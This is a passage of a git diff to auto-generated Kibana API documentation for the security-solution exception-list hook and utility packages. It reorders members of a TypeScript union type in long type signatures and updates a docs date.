created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }) => void; }) => Promise" ], "path": "packages/kbn-securitysolution-list-hooks/src/use_api/index.ts", "deprecated": false, 
@@ -785,7 +785,7 @@ "description": [], "signature": [ "ApiCallMemoProps", - " & { onSuccess: (arg: { _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }) => void; }" + " & { onSuccess: (arg: { _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; 
created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }) => void; }" ], "path": "packages/kbn-securitysolution-list-hooks/src/use_api/index.ts", "deprecated": false, 
@@ -954,7 +954,7 @@ "label": "ReturnExceptionListAndItems", "description": [], "signature": [ - "[boolean, { _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }[], ", + "[boolean, { _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; 
created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }[], ", "Pagination", ", Func | null]" ], 
@@ -996,7 +996,7 @@ "label": "ReturnPersistExceptionItem", "description": [], "signature": [ - "[PersistReturnExceptionItem, React.Dispatch<({ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; } & { comments?: { comment: string; }[] | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }) | ({ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | 
\"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; } & { _version?: string | undefined; comments?: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id?: string | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }) | null>]" + "[PersistReturnExceptionItem, React.Dispatch<({ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; 
type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; } & { comments?: { comment: string; }[] | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }) | ({ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; } & { _version?: string | undefined; comments?: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id?: string | undefined; 
item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }) | null>]" ], "path": "packages/kbn-securitysolution-list-hooks/src/use_persist_exception_item/index.ts", "deprecated": false, diff --git a/api_docs/kbn_securitysolution_list_hooks.mdx b/api_docs/kbn_securitysolution_list_hooks.mdx index ec0088a62ca80..2c751817d9bf2 100644 --- a/api_docs/kbn_securitysolution_list_hooks.mdx +++ b/api_docs/kbn_securitysolution_list_hooks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-securitysolution-list-hooks title: "@kbn/securitysolution-list-hooks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/securitysolution-list-hooks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/securitysolution-list-hooks'] --- import kbnSecuritysolutionListHooksObj from './kbn_securitysolution_list_hooks.devdocs.json'; diff --git a/api_docs/kbn_securitysolution_list_utils.devdocs.json b/api_docs/kbn_securitysolution_list_utils.devdocs.json index 557c90c7812a6..056f6248c08a1 100644 --- a/api_docs/kbn_securitysolution_list_utils.devdocs.json +++ b/api_docs/kbn_securitysolution_list_utils.devdocs.json 
@@ -27,7 +27,7 @@ "label": "addIdToEntries", "description": [], "signature": [ - "(entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]) => ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: 
\"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]" + "(entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]) => ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" 
| \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]" ], "path": "packages/kbn-securitysolution-list-utils/src/helpers/index.ts", "deprecated": false, 
@@ -40,7 +40,7 @@ "label": "entries", "description": [], "signature": [ - "({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]" + "({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: 
string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]" ], "path": "packages/kbn-securitysolution-list-utils/src/helpers/index.ts", "deprecated": false, 
@@ -58,7 +58,7 @@ "label": "buildExceptionFilter", "description": [], "signature": [ - "({ lists, excludeExceptions, chunkSize, alias, }: { lists: ({ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; } | ({ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" 
| \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; } & { comments?: { comment: string; }[] | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }))[]; excludeExceptions: boolean; chunkSize: number; alias: string | null; }) => ", + "({ lists, excludeExceptions, chunkSize, alias, }: { lists: ({ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | 
\"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; } | ({ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: 
\"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; } & { comments?: { comment: string; }[] | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }))[]; excludeExceptions: boolean; chunkSize: number; alias: string | null; }) => ", "Filter", " | undefined" ], 
@@ -83,7 +83,7 @@ "label": "lists", "description": [], "signature": [ - "({ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; } | ({ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | 
\"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; } & { comments?: { comment: string; }[] | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }))[]" + "({ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | 
